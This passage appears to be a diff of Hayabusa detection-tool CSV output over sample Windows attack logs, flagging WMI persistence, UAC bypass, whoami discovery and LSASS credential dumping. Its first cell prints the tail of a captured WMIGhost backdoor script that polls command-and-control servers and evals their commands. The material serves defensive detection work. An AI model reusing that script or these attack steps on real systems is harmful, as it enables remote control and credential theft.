keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i<vals.length;i++){result+=String.fromCharCode(vals[i]^keycode);}return result;},circleDecode:function(sc){var base=sc.charCodeAt(0);var s=base-32;var r='';for(var i=1;i<sc.length;i++){var nc=sc.charCodeAt(i)-s-i+1;if(nc<32){nc=126+(nc-32)%94;}r+=String.fromCharCode(nc);}return r;},MainLoop:function(){$.oHttp=new $._x('Microsoft.XmlHttp');var feedUrlArry=$.sFeedUrl.split(';');var start=new Date();var oXml=new ActiveXObject('MSXML2.DOMDocument.3.0');for(var n=0;n<feedUrlArry.length;n++){var UrlList=new Array();var URLnum=0;try{var tstr=feedUrlArry[n].match('http://.*?\\\\.php');if(tstr!=null){UrlList[URLnum++]=tstr;}else{$.oHttp.Open('GET',feedUrlArry[n],false);$.oHttp.setRequestHeader('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5');$.oHttp.Send();var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');var re=/<title>@(.*)@<\\/title>+/g;var titleList=response.match(re);for(var i=0;i<titleList.length;i++){try{oXml.loadXML(titleList[i]);var container=oXml.getElementsByTagName('title');var tmpstr=container[0].text.match('@(.*)@');UrlList[URLnum++]=$.circleDecode(tmpstr[1]);}catch(e){}}}for(var Urlindex=0;Urlindex<UrlList.length;Urlindex++){$.sXmlUrl=UrlList[Urlindex];var runnum=360;while(runnum-->0){$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');if(response.length>0){var commands=null;var container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var i=0;i<container.length;i++){if(container[i].getAttribute('id')=='0a552b5a4352'){commands=eval('('+container[i].text+')').command;}}}catch(e){}if(commands!=null){var commandresult='';for(var i=0;i<commands.length;i++){var result='no response';try{result=eval($.Decode(commands[i].value));}catch(e){}if(i>0){commandresult+=',';}commandresult+='\\''+commands[i].id+'\\':\\''+escape(result)+'\\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}else{$.sXmlUrl='';runnum=0;}}$.runtime=(new Date()).getTime()-start.getTime();WScript.Sleep(10000);}if($.sXmlUrl.length>0){return;}}}catch(e){}}},Fire:function(){$.InitObjects();try{$.MainLoop();}catch(e){}$.CleanObjects();}};new MAIN().Fire();"" | User: PC04\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Exec,Suspicious Scripting in a WMI Consumer,,../hayabusa-rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,info,,WMI Event Consumer To Filter Activity,"Modified | Consumer: ""\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\""ProbeScriptFint\"""" | Filter: ""\\\\.\\root\\subscription:__EventFilter.Name=\""ProbeScriptFint\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\scrcons.exe -Embedding | Process: C:\Windows\System32\wbem\scrcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2636 | PGUID: 365ABB72-F76F-5CA4-0000-0010AA201700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,Persis | PrivEsc,WMI Persistence - Script Event Consumer,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-19 01:55:37.014 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\Sysmon.exe -i,../hayabusa-rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:37.014 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:37.115 +09:00,IEWIN7,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.20,../hayabusa-rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 3232 | PGUID: 365ABB72-AC09-5CB8-0000-0010999C0700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:38.076 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 2000 | PGUID: 365ABB72-AC06-5CB8-0000-001059830700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:44.045 +09:00,IEWIN7,1,info,,Process Created,"Cmd: sysmon -c sysmonconfig-18-apr-2019.xml | Process: C:\Users\IEUser\Desktop\Sysmon.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:44.045 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:44.135 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\sysmonconfig-18-apr-2019.xml,../hayabusa-rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:44.135 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:44.145 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:51.285 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: Powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3576 | PGUID: 365ABB72-AC38-5CB8-0000-0010365E0800 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0xca21 | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800 | Hash: SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:57:06.954 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,undefined | Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 912 | PGUID: 365ABB72-AB26-5CB8-0000-0010D1AE0000,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:57:52.910 +09:00,IEWIN7,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1031,technique_name=Modify Existing Service | tcp | Src: fe80:0:0:0:80ac:4126:fa58:1b81:49158 (IEWIN7) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:135 (IEWIN7) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800",../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:12.979 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:13.389 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:13.650 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:13.740 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:14.871 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3980 | PGUID: 365ABB72-AD19-5CB8-0000-0010F4F40C00 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:34.168 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:34.448 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:34.659 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:34.689 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:35.680 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
